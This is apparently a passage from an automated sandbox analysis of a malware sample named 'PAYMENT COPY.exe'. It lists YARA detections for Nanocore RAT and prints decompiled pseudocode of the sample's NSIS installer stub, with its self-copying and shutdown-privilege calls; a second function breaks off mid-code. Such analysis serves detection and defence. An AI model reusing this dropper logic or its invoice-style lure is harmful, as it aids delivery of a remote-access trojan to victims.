                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: NanoCore, Description: unknown, Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000F.00000002.298587099.0000000002291000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Chronological Activities

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >

                                                                    Analysis Process: PAYMENT COPY.exe PID: 6392 Parent PID: 5664 PAYMENT COPY.exeCOMMON

                                                                    Executed Functions

                                                                    Function 00403486, Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366stringcomfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 86%
                                                                    			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t53;
				CHAR* _t55;
				void* _t59;
				intOrPtr _t61;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				char _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f44c = _t42;
				if(_t42 != 6) {
					_t119 = E00406656(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E004065E8(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E00406656(0xb);
				 *0x42f444 = E00406656(9);
				_t47 = E00406656(7);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f44f =  *0x42f44f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f518 = _t47;
				SHGetFileInfoA(0x429878, 0, _t164 + 0x38, 0x160, 0); // executed
				E0040624D("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\frontdesk\\Desktop\\PAYMENT COPY.exe\" ";
				E0040624D(_t160, _t51);
				 *0x42f440 = 0x400000;
				_t53 = _t160;
				if("\"C:\\Users\\frontdesk\\Desktop\\PAYMENT COPY.exe\" " == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t53 =  &M00435001;
				}
				_t55 = CharNextA(E00405C10(_t53,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t55;
				while(1) {
					_t122 =  *_t55;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t55 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t55 == 0x22) {
							_t55 =  &(_t55[1]);
							__eflags = _t55;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t55 - 0x2f;
						if( *_t55 != 0x2f) {
							L25:
							_t55 = E00405C10(_t55,  *(_t164 + 0x14));
							__eflags =  *_t55 - 0x22;
							if(__eflags == 0) {
								_t55 =  &(_t55[1]);
								__eflags = _t55;
							}
							continue;
						} else {
							_t55 =  &(_t55[1]);
							__eflags =  *_t55 - 0x53;
							if( *_t55 != 0x53) {
								L20:
								__eflags =  *_t55 - ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC");
								if( *_t55 != ((( *0x40a1e7 << 0x00000008 |  *0x40a1e6) << 0x00000008 |  *0x40a1e5) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a1df << 0x00000008 |  *0x40a1de) << 0x00000008 |  *0x40a1dd) << 0x00000008 | " /D=")) {
										 *((char*)(_t55 - 2)) = 0;
										__eflags =  &(_t55[2]);
										E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp",  &(_t55[2]));
										L30:
										_t157 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157); // executed
										_t59 = E00403455(_t172);
										_t173 = _t59;
										if(_t59 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t61 = E00402EF1(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
											if(_t61 != 0) {
												L43:
												E0040396E();
												__imp__OleUninitialize();
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4f4;
													if( *0x42f4f4 == 0) {
														L67:
														_t63 =  *0x42f50c;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E00406656(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405969( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f460 == 0) {
												L42:
												 *0x42f50c =  *0x42f50c | 0xffffffff;
												 *(_t164 + 0x18) = E00403A60( *0x42f50c);
												goto L43;
											}
											_t153 = E00405C10(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004058D4(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\frontdesk\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\frontdesk\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004058B7();
														} else {
															E0040583A();
														}
														SetCurrentDirectoryA(_t157);
														_t189 = "C:\\Users\\FRONTD~1\\AppData\\Local\\Temp"; // 0x43
														if(_t189 == 0) {
															E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t162);
														}
														E0040624D(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x120)));
															DeleteFileA(0x429478);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\frontdesk\\Desktop\\PAYMENT COPY.exe", 0x429478, 1) != 0) {
																E0040602C(_t137, 0x429478, 0);
																E004062E0(0, 0x429478, _t157, 0x429478,  *((intOrPtr*)( *0x42f454 + 0x124)));
																_t94 = E004058EC(0x429478);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E0040602C(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E00405CD3(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t154);
												E0040624D("C:\\Users\\FRONTD~1\\AppData\\Local\\Temp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a1bf << 0x00000008 |  *0x40a1be) << 0x00000008 |  *0x40a1bd) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E00403455(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E00403455(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t55[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t55[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f500 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t55 =  &(_t55[1]);
						__eflags =  *_t55 - 0x20;
					} while ( *_t55 == 0x20);
					goto L13;
				}
				goto L30;
			}

































                                                                    0x00403496
                                                                    0x0040349a
                                                                    0x004034a2
                                                                    0x004034a6
                                                                    0x004034ab
                                                                    0x004034b7
                                                                    0x004034c0
                                                                    0x004034c5
                                                                    0x004034c8
                                                                    0x004034cf
                                                                    0x004034d6
                                                                    0x004034d6
                                                                    0x004034cf
                                                                    0x004034d8
                                                                    0x004034dd
                                                                    0x004034de
                                                                    0x004034ea
                                                                    0x004034ee
                                                                    0x004034f4
                                                                    0x00403502
                                                                    0x00403507
                                                                    0x0040350e
                                                                    0x00403512
                                                                    0x00403516
                                                                    0x00403518
                                                                    0x00403518
                                                                    0x00403516
                                                                    0x00403520
                                                                    0x00403527
                                                                    0x0040352d
                                                                    0x00403543
                                                                    0x00403553
                                                                    0x00403558
                                                                    0x0040355e
                                                                    0x00403565
                                                                    0x00403571
                                                                    0x0040357b
                                                                    0x0040357d
                                                                    0x0040357f
                                                                    0x00403584
                                                                    0x00403584
                                                                    0x00403594
                                                                    0x0040359a
                                                                    0x00403663
                                                                    0x00403663
                                                                    0x00403665
                                                                    0x00403667
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035a3
                                                                    0x004035a6
                                                                    0x004035ae
                                                                    0x004035ae
                                                                    0x004035b1
                                                                    0x004035b6
                                                                    0x004035b8
                                                                    0x004035b8
                                                                    0x004035b9
                                                                    0x004035b9
                                                                    0x004035be
                                                                    0x004035c1
                                                                    0x00403653
                                                                    0x00403658
                                                                    0x0040365d
                                                                    0x00403660
                                                                    0x00403662
                                                                    0x00403662
                                                                    0x00403662
                                                                    0x00000000
                                                                    0x004035c7
                                                                    0x004035c7
                                                                    0x004035c8
                                                                    0x004035cb
                                                                    0x004035e3
                                                                    0x0040360e
                                                                    0x00403610
                                                                    0x00403623
                                                                    0x0040364e
                                                                    0x00403651
                                                                    0x0040366f
                                                                    0x00403672
                                                                    0x0040367b
                                                                    0x00403680
                                                                    0x00403686
                                                                    0x00403691
                                                                    0x00403693
                                                                    0x00403698
                                                                    0x0040369a
                                                                    0x004036f2
                                                                    0x004036f7
                                                                    0x00403701
                                                                    0x00403708
                                                                    0x0040370c
                                                                    0x004037a0
                                                                    0x004037a0
                                                                    0x004037a5
                                                                    0x004037ab
                                                                    0x004037b0
                                                                    0x004038d4
                                                                    0x004038da
                                                                    0x00403956
                                                                    0x00403956
                                                                    0x0040395b
                                                                    0x0040395e
                                                                    0x00403960
                                                                    0x00403960
                                                                    0x00403968
                                                                    0x00403968
                                                                    0x004038ea
                                                                    0x004038f2
                                                                    0x004038f4
                                                                    0x004038f5
                                                                    0x00403902
                                                                    0x00403915
                                                                    0x0040391d
                                                                    0x00403921
                                                                    0x00403921
                                                                    0x00403929
                                                                    0x0040392e
                                                                    0x00403935
                                                                    0x00403943
                                                                    0x00403945
                                                                    0x0040394b
                                                                    0x0040394d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403937
                                                                    0x0040393d
                                                                    0x0040393f
                                                                    0x00403941
                                                                    0x0040394f
                                                                    0x00403951
                                                                    0x00000000
                                                                    0x00403951
                                                                    0x00000000
                                                                    0x00403941
                                                                    0x00403935
                                                                    0x004037bf
                                                                    0x004037c6
                                                                    0x004037c6
                                                                    0x00403718
                                                                    0x00403790
                                                                    0x00403790
                                                                    0x0040379c
                                                                    0x00000000
                                                                    0x0040379c
                                                                    0x00403721
                                                                    0x00403725
                                                                    0x0040375b
                                                                    0x0040375b
                                                                    0x0040375d
                                                                    0x00403765
                                                                    0x004037d7
                                                                    0x004037d9
                                                                    0x004037e0
                                                                    0x004037e8
                                                                    0x004037e8
                                                                    0x004037f3
                                                                    0x004037f8
                                                                    0x00403807
                                                                    0x0040380b
                                                                    0x0040380c
                                                                    0x00403815
                                                                    0x0040380e
                                                                    0x0040380e
                                                                    0x0040380e
                                                                    0x0040381b
                                                                    0x00403821
                                                                    0x00403827
                                                                    0x0040382f
                                                                    0x0040382f
                                                                    0x0040383d
                                                                    0x00403842
                                                                    0x00403854
                                                                    0x0040385c
                                                                    0x00403862
                                                                    0x0040386e
                                                                    0x00403874
                                                                    0x0040387e
                                                                    0x00403894
                                                                    0x004038a5
                                                                    0x004038ab
                                                                    0x004038b2
                                                                    0x004038b5
                                                                    0x004038bb
                                                                    0x004038bb
                                                                    0x004038b2
                                                                    0x004038bf
                                                                    0x004038c5
                                                                    0x004038c5
                                                                    0x004038ca
                                                                    0x004038ca
                                                                    0x00000000
                                                                    0x00403807
                                                                    0x00403767
                                                                    0x00403769
                                                                    0x00403774
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040377c
                                                                    0x00403787
                                                                    0x0040378c
                                                                    0x00000000
                                                                    0x0040378c
                                                                    0x00403750
                                                                    0x00403752
                                                                    0x00403756
                                                                    0x00403759
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403759
                                                                    0x00000000
                                                                    0x00403752
                                                                    0x004036a2
                                                                    0x004036ae
                                                                    0x004036b3
                                                                    0x004036b8
                                                                    0x004036ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004036c2
                                                                    0x004036ca
                                                                    0x004036db
                                                                    0x004036e3
                                                                    0x004036e5
                                                                    0x004036ea
                                                                    0x004036ec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004036ec
                                                                    0x00000000
                                                                    0x00403651
                                                                    0x00403612
                                                                    0x00403615
                                                                    0x00403618
                                                                    0x0040361e
                                                                    0x0040361e
                                                                    0x0040361e
                                                                    0x0040361e
                                                                    0x00000000
                                                                    0x0040361e
                                                                    0x0040361a
                                                                    0x0040361c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040361c
                                                                    0x004035cd
                                                                    0x004035d0
                                                                    0x004035d3
                                                                    0x004035d9
                                                                    0x004035d9
                                                                    0x00000000
                                                                    0x004035d9
                                                                    0x004035d5
                                                                    0x004035d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004035a8
                                                                    0x004035a8
                                                                    0x004035a8
                                                                    0x004035a9
                                                                    0x004035a9
                                                                    0x00000000
                                                                    0x004035a8
                                                                    0x00000000

                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE ref: 004034AB
                                                                    • GetVersion.KERNEL32 ref: 004034B1
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                    • OleInitialize.OLE32(00000000), ref: 00403527
                                                                    • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                    • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000020,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                    • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                    • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                      • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                      • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                      • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,76D7FA90), ref: 00403B50
                                                                      • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user~1\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                      • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                      • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                      • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                      • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002BC,C:\Users\user~1\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                      • Part of subcall function 0040396E: CloseHandle.KERNEL32(00000298,C:\Users\user~1\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                    • ExitProcess.KERNEL32 ref: 004037C6
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                    • ExitWindowsEx.USER32 ref: 00403945
                                                                    • ExitProcess.KERNEL32 ref: 00403968
                                                                      • Part of subcall function 00405969: MessageBoxIndirectA.USER32 ref: 004059C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                    • String ID: "$"C:\Users\user\Desktop\PAYMENT COPY.exe" $.tmp$1033$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAYMENT COPY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                    • API String ID: 538718688-2580602553
                                                                    • Opcode ID: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                    • Instruction ID: 85d02637fd436e9256356bfe7db61a6cd0141c067df2f5210ca69e4cdec71f05
                                                                    • Opcode Fuzzy Hash: bce7611ef083b11c86201e58ac83bb6660836d391cee400c05623c2e8ee166ca
                                                                    • Instruction Fuzzy Hash: C9C125705047416AD7217F719D49B2B3EACAF4170AF45487FF482B61E2CB7C8A198B2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 73581A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 95%
                                                                    			E73581A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73581215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73581215();
				_t320 = E7358123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E735812FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73581534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
